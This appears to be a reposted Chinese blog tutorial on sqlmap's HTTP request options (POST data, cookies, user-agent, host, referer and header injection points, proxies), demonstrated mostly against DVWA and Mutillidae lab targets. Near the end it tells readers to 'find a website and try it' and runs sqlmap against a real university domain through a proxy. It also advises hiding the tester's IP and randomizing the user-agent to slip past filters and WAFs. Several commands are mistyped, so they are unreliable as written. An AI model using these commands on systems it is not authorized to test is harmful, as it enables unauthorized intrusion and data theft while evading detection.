SQLMAP自动注入(二)-REQUEST

来源:互联网 发布:数据库实例是什么 编辑:程序博客网 时间:2024/06/05 07:05

这里写图片描述
数据段: –data
get/post都适用
sqlmap -u “http://1.1.1.1/a.php” –data=”user=1&pass=2” -f
变量分隔符:–param-del
http://1.1.1.1/a.php?q=foo;id=1 // ; &
sqlmap -u “http://1.1.1.1/a.php” –data=”q=foo:id=1” –param-del=”;” -f
cookie头: –cookie
web应用需要基于cookie的身份认证
检查cookie中的注入点(sqlmap自动测试)
这里写图片描述
这里写图片描述
这里写图片描述
登录密码错误,302重定向之前的页面;
这里写图片描述
下面再看一下post的提交方法;

root@R:~# sqlmap -u "http://192.168.1.121mutillidae/index.php" --date="page=user-info.php&username=1&password=1&user-info-php-submit-butto=View+Account+Details" --users

问号去掉,–data=”参数”
因为DVWA是登陆后才能进行sql注入,所以这个时候就应该为sqlmap加上cookie,保证sqlmap登陆到DVWA的页面,才能模拟渗透;
这里写图片描述
这里写图片描述

root@R:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&sSubmit#" --cookie="security=low;PHPSHEEID=48cr8s0v5420dc62ef81b5af13c6e26e" --dbs

这里写图片描述
level 1不会自动扫描cookie的漏洞;至少大于等于2;
这里写图片描述
我们需要在代码中加入–level 2这个指令;

root@R:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&sSubmit#" --cookie="security=low;PHPSHEEID=48cr8s0v5420dc62ef81b5af13c6e26e" --level 2 --dbs

这里写图片描述
http头;
–user-agent(默认hsi)
sqlmap/1.0-dev-xxxxxx(http://sqlmap.org)
–random-agent(随机使用一个user-agent)
/user/share/sqlmap/txt/user-agents.txt
sqlmap检查user-agent中的注入点:Leve>=3
APP/WAF/IPS/IDS过滤异常user-agent时报错
[hh:mm:20][ERROR] the target URL responded with an unknow HTTP
Status code,try to force the HTTP User-Agent header with option –user-
agent or –random-agent
我们抓包看一下,还是上次的命令;为了清晰一点,我们先设置一下抓包的IP地址;
我们随便找一个看一下;右键,追踪流,TCP流;
这里写图片描述
如果对方做一个过滤规则,把sqlmap的user-agent删除掉,所以就会导致注入查找不成功;这个时候我们可以使用random,看下文件内容:
这里写图片描述

root@R:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&sSubmit#" --cookie="security=low;PHPSHEEID=48cr8s0v5420dc62ef81b5af13c6e26e" --random-agent --dbs

tcp.stream eq 1会话流1

tcp.stream eq 2会话流2
这里写图片描述
这里写图片描述
我们也可以自己指定一个user-agent;
这里写图片描述
这里写图片描述

root@R:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&sSubmit#" --cookie="security=low;PHPSHEEID=48cr8s0v5420dc62ef81b5af13c6e26e" --host="aaaaaaaaaaaaaaaaaa" -f
检测host头必须是level=5;不过这里一般很少有漏洞信息;
root@R:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&sSubmit#" --cookie="security=low;PHPSHEEID=48cr8s0v5420dc62ef81b5af13c6e26e" ----referer="aaaaaaaaaaaaaaaaaa" --level 3 -f 
root@R:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&sSubmit#" --cookie="security=low;PHPSHEEID=48cr8s0v5420dc62ef81b5af13c6e26e" ----headers="Host:www.abc.com\nUser-Agent:bbbbbb\n" -f

这里写图片描述
这里写图片描述
指定get方法,也可以post;最好指定,有的网站会过滤这个地方;
这里写图片描述
这里写图片描述
最好使用代理服务器,防止对真实IP封堵;
这里写图片描述
找个网站,试一下;
这里写图片描述

root@R:~# sqlmap -u "http://zsb.ybu.edu.cn/index.php?id=135" --proxy="http//127.0.0.1:8087" -f

这里写图片描述
有可能被waf保护

0 0
原创粉丝点击